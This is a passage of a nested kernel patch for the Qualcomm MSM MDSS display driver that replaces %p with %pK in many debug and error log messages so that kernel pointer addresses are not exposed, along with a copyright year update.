-+	pr_debug("current process=%s pid=%d mfd->ref=%d file:%pK\n",
- 		task->comm, current->tgid, mfd->ref_cnt, info->file);
- 
- 	if (!mfd->ref_cnt || release_all) {
-@@ -4242,7 +4242,7 @@ static int mdss_fb_atomic_commit_ioctl(struct fb_info *info,
- 			ret = copy_from_user(scale, layer->scale,
- 					sizeof(struct mdp_scale_data));
- 			if (ret) {
--				pr_err("layer list copy from user failed, scale = %p\n",
-+				pr_err("layer list copy from user failed, scale = %pK\n",
- 						layer->scale);
- 				kfree(scale);
- 				scale = NULL;
-diff --git a/drivers/video/msm/mdss/mdss_hdmi_tx.c b/drivers/video/msm/mdss/mdss_hdmi_tx.c
-index 9ce7812..b234d1e 100644
---- a/drivers/video/msm/mdss/mdss_hdmi_tx.c
-+++ b/drivers/video/msm/mdss/mdss_hdmi_tx.c
-@@ -1458,7 +1458,7 @@ static int hdmi_tx_sysfs_create(struct hdmi_tx_ctrl *hdmi_ctrl,
- 		return rc;
- 	}
- 	hdmi_ctrl->kobj = &fbi->dev->kobj;
--	DEV_DBG("%s: sysfs group %p\n", __func__, hdmi_ctrl->kobj);
-+	DEV_DBG("%s: sysfs group %pK\n", __func__, hdmi_ctrl->kobj);
- 
- 	return 0;
- } /* hdmi_tx_sysfs_create */
-@@ -4790,7 +4790,7 @@ static int hdmi_tx_init_resource(struct hdmi_tx_ctrl *hdmi_ctrl)
- 			DEV_DBG("%s: '%s' remap failed or not available\n",
- 				__func__, hdmi_tx_io_name(i));
- 		}
--		DEV_INFO("%s: '%s': start = 0x%p, len=0x%x\n", __func__,
-+		DEV_INFO("%s: '%s': start = 0x%pK, len=0x%x\n", __func__,
- 			hdmi_tx_io_name(i), pdata->io[i].base,
- 			pdata->io[i].len);
- 	}
-@@ -5298,7 +5298,7 @@ static int hdmi_tx_get_dt_data(struct platform_device *pdev,
- 
- 	data = of_get_property(pdev->dev.of_node, "qcom,display-id", &len);
- 	if (!data || len <= 0)
--		pr_err("%s:%d Unable to read qcom,display-id, data=%p,len=%d\n",
-+		pr_err("%s:%d Unable to read qcom,display-id, data=%pK,len=%d\n",
- 			__func__, __LINE__, data, len);
- 	else
- 		snprintf(hdmi_ctrl->panel_data.panel_info.display_id,
-diff --git a/drivers/video/msm/mdss/mdss_mdp.c b/drivers/video/msm/mdss/mdss_mdp.c
-index e7301ae..2b0bcec 100644
---- a/drivers/video/msm/mdss/mdss_mdp.c
-+++ b/drivers/video/msm/mdss/mdss_mdp.c
-@@ -481,7 +481,7 @@ struct reg_bus_client *mdss_reg_bus_vote_client_create(char *client_name)
- 	strlcpy(client->name, client_name, MAX_CLIENT_NAME_LEN);
- 	client->usecase_ndx = VOTE_INDEX_DISABLE;
- 	client->id = id;
--	pr_debug("bus vote client %s created:%p id :%d\n", client_name,
-+	pr_debug("bus vote client %s created:%pK id :%d\n", client_name,
- 		client, id);
- 	id++;
- 	list_add(&client->list, &mdss_res->reg_bus_clist);
-@@ -495,7 +495,7 @@ void mdss_reg_bus_vote_client_destroy(struct reg_bus_client *client)
- 	if (!client) {
- 		pr_err("reg bus vote: invalid client handle\n");
- 	} else {
--		pr_debug("bus vote client %s destroyed:%p id:%u\n",
-+		pr_debug("bus vote client %s destroyed:%pK id:%u\n",
- 			client->name, client, client->id);
- 		mutex_lock(&mdss_res->reg_bus_lock);
- 		list_del_init(&client->list);
-@@ -1561,7 +1561,7 @@ static u32 mdss_mdp_res_init(struct mdss_data_type *mdata)
- 
- 	mdata->iclient = msm_ion_client_create(mdata->pdev->name);
- 	if (IS_ERR_OR_NULL(mdata->iclient)) {
--		pr_err("msm_ion_client_create() return error (%p)\n",
-+		pr_err("msm_ion_client_create() return error (%pK)\n",
- 				mdata->iclient);
- 		mdata->iclient = NULL;
- 	}
-@@ -2028,7 +2028,7 @@ static int mdss_mdp_probe(struct platform_device *pdev)
- 	if (rc)
- 		pr_debug("unable to map MDSS VBIF non-realtime base\n");
- 	else
--		pr_debug("MDSS VBIF NRT HW Base addr=%p len=0x%x\n",
-+		pr_debug("MDSS VBIF NRT HW Base addr=%pK len=0x%x\n",
- 			mdata->vbif_nrt_io.base, mdata->vbif_nrt_io.len);
- 
- 	res = platform_get_resource(pdev, IORESOURCE_IRQ, 0);
-@@ -2923,7 +2923,7 @@ static int mdss_mdp_cdm_addr_setup(struct mdss_data_type *mdata,
- 		head[i].base = (mdata->mdss_io.base) + cdm_offsets[i];
- 		atomic_set(&head[i].kref.refcount, 0);
- 		mutex_init(&head[i].lock);
--		pr_debug("%s: cdm off (%d) = %p\n", __func__, i, head[i].base);
-+		pr_debug("%s: cdm off (%d) = %pK\n", __func__, i, head[i].base);
- 	}
- 
- 	mdata->cdm_off = head;
-@@ -2990,7 +2990,7 @@ static int mdss_mdp_dsc_addr_setup(struct mdss_data_type *mdata,
- 	for (i = 0; i < len; i++) {
- 		head[i].num = i;
- 		head[i].base = (mdata->mdss_io.base) + dsc_offsets[i];
--		pr_debug("dsc off (%d) = %p\n", i, head[i].base);
-+		pr_debug("dsc off (%d) = %pK\n", i, head[i].base);
- 	}
- 
- 	mdata->dsc_off = head;
-diff --git a/drivers/video/msm/mdss/mdss_mdp_intf_cmd.c b/drivers/video/msm/mdss/mdss_mdp_intf_cmd.c
-index ba13444..cd1f02b 100644
---- a/drivers/video/msm/mdss/mdss_mdp_intf_cmd.c
-+++ b/drivers/video/msm/mdss/mdss_mdp_intf_cmd.c
-@@ -1549,7 +1549,7 @@ static int mdss_mdp_cmd_wait4pingpong(struct mdss_mdp_ctl *ctl, void *arg)
- 	MDSS_XLOG(ctl->num, atomic_read(&ctx->koff_cnt), ctl->roi_bkup.w,
- 			ctl->roi_bkup.h);
- 
--	pr_debug("%s: intf_num=%d ctx=%p koff_cnt=%d\n", __func__,
-+	pr_debug("%s: intf_num=%d ctx=%pK koff_cnt=%d\n", __func__,
- 			ctl->intf_num, ctx, atomic_read(&ctx->koff_cnt));
- 
- 	rc = wait_event_timeout(ctx->pp_waitq,
-@@ -1777,7 +1777,7 @@ int mdss_mdp_cmd_set_autorefresh_mode(struct mdss_mdp_ctl *mctl, int frame_cnt)
- 	struct mdss_panel_info *pinfo;
- 
- 	if (!mctl || !mctl->is_master || !mctl->panel_data) {
--		pr_err("invalid ctl mctl:%p pdata:%p\n",
-+		pr_err("invalid ctl mctl:%pK pdata:%pK\n",
- 			mctl, mctl ? mctl->panel_data : 0);
- 		return -ENODEV;
- 	}
-@@ -2782,7 +2782,7 @@ static int mdss_mdp_cmd_ctx_setup(struct mdss_mdp_ctl *ctl,
- 
- 	ctx->intf_stopped = 0;
- 
--	pr_debug("%s: ctx=%p num=%d aux=%d\n", __func__, ctx,
-+	pr_debug("%s: ctx=%pK num=%d aux=%d\n", __func__, ctx,
- 		default_pp_num, aux_pp_num);
- 	MDSS_XLOG(ctl->num, atomic_read(&ctx->koff_cnt));
- 
-diff --git a/drivers/video/msm/mdss/mdss_mdp_intf_video.c b/drivers/video/msm/mdss/mdss_mdp_intf_video.c
-index 6924e64..b0fc8fc 100644
---- a/drivers/video/msm/mdss/mdss_mdp_intf_video.c
-+++ b/drivers/video/msm/mdss/mdss_mdp_intf_video.c
-@@ -123,7 +123,7 @@ int mdss_mdp_video_addr_setup(struct mdss_data_type *mdata,
- 
- 	for (i = 0; i < count; i++) {
- 		head[i].base = mdata->mdss_io.base + offsets[i];
--		pr_debug("adding Video Intf #%d offset=0x%x virt=%p\n", i,
-+		pr_debug("adding Video Intf #%d offset=0x%x virt=%pK\n", i,
- 				offsets[i], head[i].base);
- 		head[i].ref_cnt = 0;
- 		head[i].intf_num = i + MDSS_MDP_INTF0;
-@@ -520,7 +520,7 @@ static int mdss_mdp_video_intfs_stop(struct mdss_mdp_ctl *ctl,
- 		pr_err("Intf %d not in use\n", (inum + MDSS_MDP_INTF0));
- 		return -ENODEV;
- 	}
--	pr_debug("stop ctl=%d video Intf #%d base=%p", ctl->num, ctx->intf_num,
-+	pr_debug("stop ctl=%d video Intf #%d base=%pK", ctl->num, ctx->intf_num,
- 			ctx->base);
- 
- 	ret = mdss_mdp_video_ctx_stop(ctl, pinfo, ctx);
-@@ -538,7 +538,7 @@ static int mdss_mdp_video_intfs_stop(struct mdss_mdp_ctl *ctl,
- 			pr_err("Intf %d not in use\n", (inum + MDSS_MDP_INTF0));
- 			return -ENODEV;
- 		}
--		pr_debug("stop ctl=%d video Intf #%d base=%p", ctl->num,
-+		pr_debug("stop ctl=%d video Intf #%d base=%pK", ctl->num,
- 				sctx->intf_num, sctx->base);
- 
- 		ret = mdss_mdp_video_ctx_stop(ctl, pinfo, sctx);
-@@ -1535,7 +1535,7 @@ static int mdss_mdp_video_intfs_setup(struct mdss_mdp_ctl *ctl,
- 					(inum + MDSS_MDP_INTF0));
- 			return -EBUSY;
- 		}
--		pr_debug("video Intf #%d base=%p", ctx->intf_num, ctx->base);
-+		pr_debug("video Intf #%d base=%pK", ctx->intf_num, ctx->base);
- 		ctx->ref_cnt++;
- 	} else {
- 		pr_err("Invalid intf number: %d\n", (inum + MDSS_MDP_INTF0));
-@@ -1568,7 +1568,7 @@ static int mdss_mdp_video_intfs_setup(struct mdss_mdp_ctl *ctl,
- 					(inum + MDSS_MDP_INTF0));
- 			return -EBUSY;
- 		}
--		pr_debug("video Intf #%d base=%p", ctx->intf_num, ctx->base);
-+		pr_debug("video Intf #%d base=%pK", ctx->intf_num, ctx->base);
- 		ctx->ref_cnt++;
- 
- 		ctl->intf_ctx[SLAVE_CTX] = ctx;
-diff --git a/drivers/video/msm/mdss/mdss_mdp_layer.c b/drivers/video/msm/mdss/mdss_mdp_layer.c
-index 2e8008d..0615625 100644
---- a/drivers/video/msm/mdss/mdss_mdp_layer.c
-+++ b/drivers/video/msm/mdss/mdss_mdp_layer.c
-@@ -446,7 +446,7 @@ static int __configure_pipe_params(struct msm_fb_data_type *mfd,
- 	mixer = mdss_mdp_mixer_get(mdp5_data->ctl, mixer_mux);
- 	pipe->src_fmt = mdss_mdp_get_format_params(layer->buffer.format);
- 	if (!pipe->src_fmt || !mixer) {
--		pr_err("invalid layer format:%d or mixer:%p\n",
-+		pr_err("invalid layer format:%d or mixer:%pK\n",
- 				layer->buffer.format, pipe->mixer_left);
- 		ret = -EINVAL;
- 		goto end;
-@@ -1354,7 +1354,7 @@ validate_exit:
- 			}
- 		} else {
- 			pipe->file = file;
--			pr_debug("file pointer attached with pipe is %p\n",
-+			pr_debug("file pointer attached with pipe is %pK\n",
- 				file);
- 		}
- 	}
-diff --git a/drivers/video/msm/mdss/mdss_mdp_overlay.c b/drivers/video/msm/mdss/mdss_mdp_overlay.c
-index 495b28f..c01968c 100644
---- a/drivers/video/msm/mdss/mdss_mdp_overlay.c
-+++ b/drivers/video/msm/mdss/mdss_mdp_overlay.c
-@@ -1080,7 +1080,7 @@ struct mdss_mdp_data *mdss_mdp_overlay_buf_alloc(struct msm_fb_data_type *mfd,
- 	list_move_tail(&buf->buf_list, &mdp5_data->bufs_used);
- 	list_add_tail(&buf->pipe_list, &pipe->buf_queue);
- 
--	pr_debug("buffer alloc: %p\n", buf);
-+	pr_debug("buffer alloc: %pK\n", buf);
- 
- 	return buf;
- }
-@@ -1134,7 +1134,7 @@ void mdss_mdp_overlay_buf_free(struct msm_fb_data_type *mfd,
- 	buf->last_freed = local_clock();
- 	buf->state = MDP_BUF_STATE_UNUSED;
- 
--	pr_debug("buffer freed: %p\n", buf);
-+	pr_debug("buffer freed: %pK\n", buf);
- 
- 	list_move_tail(&buf->buf_list, &mdp5_data->bufs_pool);
- }
-@@ -1474,7 +1474,7 @@ static int __overlay_queue_pipes(struct msm_fb_data_type *mfd)
- 		if (buf) {
- 			switch (buf->state) {
- 			case MDP_BUF_STATE_READY:
--				pr_debug("pnum=%d buf=%p first buffer ready\n",
-+				pr_debug("pnum=%d buf=%pK first buffer ready\n",
- 						pipe->num, buf);
- 				break;
- 			case MDP_BUF_STATE_ACTIVE:
-@@ -1494,7 +1494,7 @@ static int __overlay_queue_pipes(struct msm_fb_data_type *mfd)
- 				}
- 				break;
- 			default:
--				pr_err("invalid state of buf %p=%d\n",
-+				pr_err("invalid state of buf %pK=%d\n",
- 						buf, buf->state);
- 				BUG();
- 				break;
-@@ -2160,7 +2160,7 @@ static int __mdss_mdp_overlay_release_all(struct msm_fb_data_type *mfd,
- 	u32 unset_ndx = 0;
- 	int cnt = 0;
- 
--	pr_debug("releasing all resources for fb%d file:%p\n",
-+	pr_debug("releasing all resources for fb%d file:%pK\n",
- 		mfd->index, file);
- 
- 	mutex_lock(&mdp5_data->ov_lock);
-diff --git a/drivers/video/msm/mdss/mdss_mdp_pipe.c b/drivers/video/msm/mdss/mdss_mdp_pipe.c
-index b14dd17..f7fbb7f 100644
---- a/drivers/video/msm/mdss/mdss_mdp_pipe.c
-+++ b/drivers/video/msm/mdss/mdss_mdp_pipe.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -2278,7 +2278,7 @@ int mdss_mdp_pipe_queue_data(struct mdss_mdp_pipe *pipe,
- 	}
- 
- 	if (src_data == NULL) {
--		pr_debug("src_data=%p pipe num=%dx\n",
-+		pr_debug("src_data=%pK pipe num=%dx\n",
- 				src_data, pipe->num);
- 		goto update_nobuf;
- 	}
-diff --git a/drivers/video/msm/mdss/mdss_mdp_pp.c b/drivers/video/msm/mdss/mdss_mdp_pp.c
-index 580d10b..6d59502 100644
---- a/drivers/video/msm/mdss/mdss_mdp_pp.c
-+++ b/drivers/video/msm/mdss/mdss_mdp_pp.c
-@@ -1096,7 +1096,7 @@ static int pp_rgb_pipe_setup(struct mdss_mdp_pipe *pipe, u32 *op)
- 	int ret = 0;
- 
- 	if (!pipe) {
--		pr_err("invalid param pipe %p\n", pipe);
-+		pr_err("invalid param pipe %pK\n", pipe);
- 		return -EINVAL;
- 	}
- 	if (pipe->flags & MDP_OVERLAY_PP_CFG_EN &&
-@@ -1114,7 +1114,7 @@ static int pp_dma_pipe_setup(struct mdss_mdp_pipe *pipe, u32 *op)
- 	int ret = 0;
- 
- 	if (!pipe) {
--		pr_err("invalid param pipe %p\n", pipe);
-+		pr_err("invalid param pipe %pK\n", pipe);
- 		return -EINVAL;
- 	}
- 	if (pipe->flags & MDP_OVERLAY_PP_CFG_EN &&
-@@ -1435,7 +1435,7 @@ void mdss_mdp_pipe_pp_clear(struct mdss_mdp_pipe *pipe)
- 	struct pp_hist_col_info *hist_info;
- 
- 	if (!pipe) {
--		pr_err("Invalid pipe context passed, %p\n",
-+		pr_err("Invalid pipe context passed, %pK\n",
- 			pipe);
- 		return;
- 	}
-@@ -1582,7 +1582,7 @@ static int pp_mixer_setup(struct mdss_mdp_mixer *mixer)
- 	struct mdss_data_type *mdata = mdss_mdp_get_mdata();
- 
- 	if (!mixer || !mixer->ctl || !mixer->ctl->mfd || !mdata) {
--		pr_err("invalid parameters, mixer %p ctl %p mfd %p mdata %p\n",
-+		pr_err("invalid parameters, mixer %pK ctl %pK mfd %pK mdata %pK\n",
- 			mixer, (mixer ? mixer->ctl : NULL),
- 			(mixer ? (mixer->ctl ? mixer->ctl->mfd : NULL) : NULL),
- 			mdata);
-@@ -2200,7 +2200,7 @@ int mdss_mdp_pp_resume(struct msm_fb_data_type *mfd)
- 	struct mdp_pa_v2_cfg_data *pa_v2_cache_cfg = NULL;
- 
- 	if (!mfd) {
--		pr_err("invalid input: mfd = 0x%p\n", mfd);
-+		pr_err("invalid input: mfd = 0x%pK\n", mfd);
- 		return -EINVAL;
- 	}
- 
-@@ -2290,7 +2290,7 @@ int mdss_mdp_pp_resume(struct msm_fb_data_type *mfd)
- 			mfd->index);
- 		return 0;
- 	} else if (ret || !ad) {
--		pr_err("Failed to get ad info: ret = %d, ad = 0x%p.\n",
-+		pr_err("Failed to get ad info: ret = %d, ad = 0x%pK.\n",
- 			ret, ad);
- 		return ret;
- 	}
-@@ -2431,7 +2431,7 @@ static int mdss_mdp_pp_dt_parse(struct device *dev)
- 			ret = 0;
- 		}
- 	} else {
--		pr_err("invalid dev %p mdata %p\n", dev, mdata);
-+		pr_err("invalid dev %pK mdata %pK\n", dev, mdata);
- 		ret = -EINVAL;
- 	}
- bail_out:
-@@ -2570,7 +2570,7 @@ int mdss_mdp_pp_overlay_init(struct msm_fb_data_type *mfd)
- 	struct mdss_data_type *mdata = mdss_mdp_get_mdata();
- 
- 	if (!mfd || !mdata) {
--		pr_err("Invalid mfd %p mdata %p\n", mfd, mdata);
-+		pr_err("Invalid mfd %pK mdata %pK\n", mfd, mdata);
- 		return -EPERM;
- 	}
- 
-@@ -2586,7 +2586,7 @@ int mdss_mdp_pp_default_overlay_config(struct msm_fb_data_type *mfd,
- 	int ret = 0;
- 
- 	if (!mfd || !pdata) {
--		pr_err("Invalid parameters mfd %p pdata %p\n", mfd, pdata);
-+		pr_err("Invalid parameters mfd %pK pdata %pK\n", mfd, pdata);
- 		return -EINVAL;
- 	}
- 
-@@ -2639,7 +2639,7 @@ static int pp_ad_calc_bl(struct msm_fb_data_type *mfd, int bl_in, int *bl_out,
- 			mfd->index);
- 		return 0;
- 	} else if (ret || !ad) {
--		pr_err("Failed to get ad info: ret = %d, ad = 0x%p.\n",
-+		pr_err("Failed to get ad info: ret = %d, ad = 0x%pK\n",
- 			ret, ad);
- 		return ret;
- 	}
-@@ -2655,7 +2655,7 @@ static int pp_ad_calc_bl(struct msm_fb_data_type *mfd, int bl_in, int *bl_out,
- 
- 	if (!ad->bl_mfd || !ad->bl_mfd->panel_info ||
- 		!ad->bl_att_lut) {
--		pr_err("Invalid ad info: bl_mfd = 0x%p, ad->bl_mfd->panel_info = 0x%p, bl_att_lut = 0x%p\n",
-+		pr_err("Invalid ad info: bl_mfd = 0x%pK, ad->bl_mfd->panel_info = 0x%pK, bl_att_lut = 0x%pK\n",
- 			ad->bl_mfd,
- 			(!ad->bl_mfd) ? NULL : ad->bl_mfd->panel_info,
- 			ad->bl_att_lut);
-@@ -3147,7 +3147,7 @@ int mdss_mdp_pcc_config(struct msm_fb_data_type *mfd,
- 		if (pp_ops[PCC].pp_get_config) {
- 			addr = mdss_mdp_get_dspp_addr_off(disp_num);
- 			if (IS_ERR_OR_NULL(addr)) {
--				pr_err("invalid dspp base_addr %p\n",
-+				pr_err("invalid dspp base_addr %pK\n",
- 					addr);
- 				ret = -EINVAL;
- 				goto pcc_clk_off;
-@@ -3835,7 +3835,7 @@ int mdss_mdp_hist_lut_config(struct msm_fb_data_type *mfd,
- 		mdss_mdp_clk_ctrl(MDP_BLOCK_POWER_ON);
- 		base_addr = mdss_mdp_get_dspp_addr_off(dspp_num);
- 		if (IS_ERR_OR_NULL(base_addr)) {
--			pr_err("invalid base addr %p\n",
-+			pr_err("invalid base addr %pK\n",
- 				base_addr);
- 			ret = -EINVAL;
- 			goto hist_lut_clk_off;
-@@ -4063,7 +4063,7 @@ int mdss_mdp_gamut_config(struct msm_fb_data_type *mfd,
- 		if (pp_ops[GAMUT].pp_get_config) {
- 			addr = mdss_mdp_get_dspp_addr_off(disp_num);
- 			if (IS_ERR_OR_NULL(addr)) {
--				pr_err("invalid dspp base addr %p\n",
-+				pr_err("invalid dspp base addr %pK\n",
- 				       addr);
- 				ret = -EINVAL;
- 				goto gamut_clk_off;
-@@ -4249,7 +4249,7 @@ static int pp_hist_enable(struct pp_hist_col_info *hist_info,
- 	spin_lock_irqsave(&hist_info->hist_lock, flag);
- 	if (hist_info->col_en) {
- 		spin_unlock_irqrestore(&hist_info->hist_lock, flag);
--		pr_err("%s Hist collection has already been enabled %p\n",
-+		pr_err("%s Hist collection has already been enabled %pK\n",
- 			__func__, hist_info->base);
- 		ret = -EBUSY;
- 		goto exit;
-@@ -4405,7 +4405,7 @@ static int pp_hist_disable(struct pp_hist_col_info *hist_info)
- 	spin_lock_irqsave(&hist_info->hist_lock, flag);
- 	if (hist_info->col_en == false) {
- 		spin_unlock_irqrestore(&hist_info->hist_lock, flag);
--		pr_debug("Histogram already disabled (%p)\n", hist_info->base);
-+		pr_debug("Histogram already disabled (%pK)\n", hist_info->base);
- 		ret = -EINVAL;
- 		goto exit;
- 	}
-@@ -4508,7 +4508,7 @@ int mdss_mdp_hist_intr_req(struct mdss_intr *intr, u32 bits, bool en)
- 	unsigned long flag;
- 	int ret = 0;
- 	if (!intr) {
--		pr_err("NULL addr passed, %p\n", intr);
-+		pr_err("NULL addr passed, %pK\n", intr);
- 		return -EINVAL;
- 	}
- 
-@@ -5086,7 +5086,7 @@ static int mdss_mdp_get_ad(struct msm_fb_data_type *mfd,
- 
- 	*ret_ad = NULL;
- 	if (!mfd) {
--		pr_err("invalid parameter mfd %p\n", mfd);
-+		pr_err("invalid parameter mfd %pK\n", mfd);
- 		return -EINVAL;
- 	}
- 	mdata = mfd_to_mdata(mfd);
-@@ -5133,7 +5133,7 @@ static int pp_ad_invalidate_input(struct msm_fb_data_type *mfd)
- 			mfd->index);
- 		return 0;
- 	} else if (ret || !ad) {
--		pr_err("Failed to get ad info: ret = %d, ad = 0x%p.\n",
-+		pr_err("Failed to get ad info: ret = %d, ad = 0x%pK\n",
- 			ret, ad);
- 		return ret;
- 	}
-@@ -5168,7 +5168,7 @@ int mdss_mdp_ad_config(struct msm_fb_data_type *mfd,
- 			mfd->index);
- 		return ret;
- 	} else if (ret || !ad) {
--		pr_err("Failed to get ad info: ret = %d, ad = 0x%p.\n",
-+		pr_err("Failed to get ad info: ret = %d, ad = 0x%pK\n",
- 			ret, ad);
- 		return ret;
- 	}
-@@ -5285,7 +5285,7 @@ int mdss_mdp_ad_input(struct msm_fb_data_type *mfd,
- 			mfd->index);
- 		return ret;
- 	} else if (ret || !ad) {
--		pr_err("Failed to get ad info: ret = %d, ad = 0x%p.\n",
-+		pr_err("Failed to get ad info: ret = %d, ad = 0x%pK\n",
- 			ret, ad);
- 		return ret;
- 	}
-@@ -5638,7 +5638,7 @@ static int mdss_mdp_ad_ipc_reset(struct msm_fb_data_type *mfd)
- 	struct mdss_ad_info *ad;
- 
- 	if (!mfd) {
--		pr_err("mfd = 0x%p\n", mfd);
-+		pr_err("mfd = 0x%pK\n", mfd);
- 		return -EINVAL;
- 	}
- 
-@@ -5648,7 +5648,7 @@ static int mdss_mdp_ad_ipc_reset(struct msm_fb_data_type *mfd)
- 			mfd->index);
- 		return 0;
- 	} else if (ret || !ad) {
--		pr_err("Failed to get ad info: ret = %d, ad = 0x%p.\n",
-+		pr_err("Failed to get ad info: ret = %d, ad = 0x%pK\n",
- 			ret, ad);
- 		return ret;
- 	}
-@@ -5672,13 +5672,13 @@ static int mdss_mdp_ad_setup(struct msm_fb_data_type *mfd)
- 	u32 width;
- 
- 	if (!mfd) {
--		pr_err("mfd = 0x%p\n", mfd);
-+		pr_err("mfd = 0x%pK\n", mfd);
- 		return -EINVAL;
- 	}
- 
- 	ctl = mfd_to_ctl(mfd);
- 	if (!ctl) {
--		pr_err("ctl = 0x%p\n", ctl);
-+		pr_err("ctl = 0x%pK\n", ctl);
- 		return -EINVAL;
- 	}
- 	sctl = mdss_mdp_get_split_ctl(ctl);
-@@ -5689,7 +5689,7 @@ static int mdss_mdp_ad_setup(struct msm_fb_data_type *mfd)
- 			mfd->index);
- 		return 0;
- 	} else if (ret || !ad) {
--		pr_err("Failed to get ad info: ret = %d, ad = 0x%p.\n",
-+		pr_err("Failed to get ad info: ret = %d, ad = 0x%pK\n",
- 			ret, ad);
- 		return ret;
- 	}
-@@ -5873,7 +5873,7 @@ static void pp_ad_calc_worker(struct work_struct *work)
- 	}
- 	mdp5_data = mfd_to_mdp5_data(ad->mfd);
- 	if (!mdp5_data) {
--		pr_err("mdp5_data = 0x%p\n", mdp5_data);
-+		pr_err("mdp5_data = 0x%pK\n", mdp5_data);
- 		mutex_unlock(&ad->lock);
- 		return;
- 	}
-@@ -5881,7 +5881,7 @@ static void pp_ad_calc_worker(struct work_struct *work)
- 	ctl = mfd_to_ctl(ad->mfd);
- 	mdata = mfd_to_mdata(ad->mfd);
- 	if (!ctl || !mdata || ad->calc_hw_num >= mdata->nad_cfgs) {
--		pr_err("ctl = 0x%p, mdata = 0x%p, ad->calc_hw_num = %d, mdata->nad_cfg = %d\n",
-+		pr_err("ctl = 0x%pK, mdata = 0x%pK, ad->calc_hw_num = %d, mdata->nad_cfg = %d\n",
- 			ctl, mdata, ad->calc_hw_num,
- 			(!mdata ? 0 : mdata->nad_cfgs));
- 		mutex_unlock(&ad->lock);
-@@ -6492,7 +6492,7 @@ static int sspp_cache_location(u32 pipe_type, enum pp_config_block *block)
- 	int ret = 0;
- 
- 	if (!block) {
--		pr_err("invalid params %p\n", block);
-+		pr_err("invalid params %pK\n", block);
- 		return -EINVAL;
- 	}
- 	switch (pipe_type) {
-@@ -6521,7 +6521,7 @@ int mdss_mdp_pp_sspp_config(struct mdss_mdp_pipe *pipe)
- 	int ret = 0;
- 
- 	if (!pipe) {
--		pr_err("invalid params, pipe %p\n", pipe);
-+		pr_err("invalid params, pipe %pK\n", pipe);
- 		return -EINVAL;
- 	}
- 
-@@ -6643,7 +6643,7 @@ static int pp_update_pcc_pipe_setup(struct mdss_mdp_pipe *pipe, u32 location)
- 	char __iomem *pipe_base = NULL;
- 
- 	if (!pipe) {
--		pr_err("invalid param pipe %p\n", pipe);
-+		pr_err("invalid param pipe %pK\n", pipe);
- 		return -EINVAL;
- 	}
- 
-@@ -6695,7 +6695,7 @@ int mdss_mdp_pp_get_version(struct mdp_pp_feature_version *version)
- 	u32 ver_info = mdp_pp_legacy;
- 
- 	if (!version) {
--		pr_err("invalid param version %p\n", version);
-+		pr_err("invalid param version %pK\n", version);
- 		ret = -EINVAL;
- 		goto exit_version;
- 	}
-@@ -6776,7 +6776,7 @@ int mdss_mdp_copy_layer_pp_info(struct mdp_input_layer *layer)
- 	uint32_t ops;
- 
- 	if (!layer) {
--		pr_err("invalid layer pointer passed %p\n", layer);
-+		pr_err("invalid layer pointer passed %pK\n", layer);
- 		return -EFAULT;
- 	}
- 
-@@ -6788,7 +6788,7 @@ int mdss_mdp_copy_layer_pp_info(struct mdp_input_layer *layer)
- 	ret = copy_from_user(pp_info, layer->pp_info,
- 			sizeof(struct mdp_overlay_pp_params));
- 	if (ret) {
--		pr_err("layer list copy from user failed, pp_info = %p\n",
-+		pr_err("layer list copy from user failed, pp_info = %pK\n",
- 			layer->pp_info);
- 		ret = -EFAULT;
- 		goto exit_pp_info;
-@@ -6921,7 +6921,7 @@ static int pp_mfd_ad_release_all(struct msm_fb_data_type *mfd)
- 	int ret = 0;
- 
- 	if (!mdata || !mfd) {
--		pr_err("invalid params mdata %p mfd %p\n", mdata, mfd);
-+		pr_err("invalid params mdata %pK mfd %pK\n", mdata, mfd);
- 		return -EINVAL;
- 	}
- 	if (!mdata->ad_calc_wq)
-diff --git a/drivers/video/msm/mdss/mdss_mdp_pp_cache_config.c b/drivers/video/msm/mdss/mdss_mdp_pp_cache_config.c
-index 7769a8f..5fe7e48 100644
---- a/drivers/video/msm/mdss/mdss_mdp_pp_cache_config.c
-+++ b/drivers/video/msm/mdss/mdss_mdp_pp_cache_config.c
-@@ -103,7 +103,7 @@ static int pp_hist_lut_cache_params_v1_7(struct mdp_hist_lut_data *config,
- 	int ret = 0;
- 
- 	if (!config || !mdss_pp_res) {
--		pr_err("invalid param config %p pp_res %p\n",
-+		pr_err("invalid param config %pK pp_res %pK\n",
- 			config, mdss_pp_res);
- 		return -EINVAL;
- 	}
-@@ -113,7 +113,7 @@ static int pp_hist_lut_cache_params_v1_7(struct mdp_hist_lut_data *config,
- 		return -EINVAL;
- 	}
- 	if (!mdss_pp_res->pp_data_res) {
--		pr_err("invalid pp_data_res %p\n", mdss_pp_res->pp_data_res);
-+		pr_err("invalid pp_data_res %pK\n", mdss_pp_res->pp_data_res);
- 		return -EINVAL;
- 	}
- 
-@@ -165,7 +165,7 @@ static int pp_hist_lut_cache_params_pipe_v1_7(struct mdp_hist_lut_data *config,
- 	int ret = 0;
- 
- 	if (!config || !pipe) {
--		pr_err("Invalid param config %p pipe %p\n",
-+		pr_err("Invalid param config %pK pipe %pK\n",
- 			config, pipe);
- 		return -EINVAL;
- 	}
-@@ -236,7 +236,7 @@ int pp_hist_lut_cache_params(struct mdp_hist_lut_data *config,
- 	int ret = 0;
- 
- 	if (!config || !res_cache) {
--		pr_err("invalid param config %p res_cache %p\n",
-+		pr_err("invalid param config %pK res_cache %pK\n",
- 			config, res_cache);
- 		return -EINVAL;
- 	}
-@@ -245,7 +245,7 @@ int pp_hist_lut_cache_params(struct mdp_hist_lut_data *config,
- 		return -EINVAL;
- 	}
- 	if (!res_cache->mdss_pp_res && !res_cache->pipe_res) {
--		pr_err("NULL payload for block %d mdss_pp_res %p pipe_res %p\n",
-+		pr_err("NULL payload for block %d mdss_pp_res %pK pipe_res %pK\n",
- 			res_cache->block, res_cache->mdss_pp_res,
- 			res_cache->pipe_res);
- 		return -EINVAL;
-@@ -286,7 +286,7 @@ int pp_dither_cache_params_v1_7(struct mdp_dither_cfg_data *config,
- 	struct mdp_dither_data_v1_7 *v17_cache_data = NULL, v17_usr_config;
- 
- 	if (!config || !mdss_pp_res) {
--		pr_err("invalid param config %p pp_res %p\n",
-+		pr_err("invalid param config %pK pp_res %pK\n",
- 			config, mdss_pp_res);
- 		return -EINVAL;
- 	}
-@@ -296,7 +296,7 @@ int pp_dither_cache_params_v1_7(struct mdp_dither_cfg_data *config,
- 		return -EINVAL;
- 	}
- 	if (!mdss_pp_res->pp_data_res) {
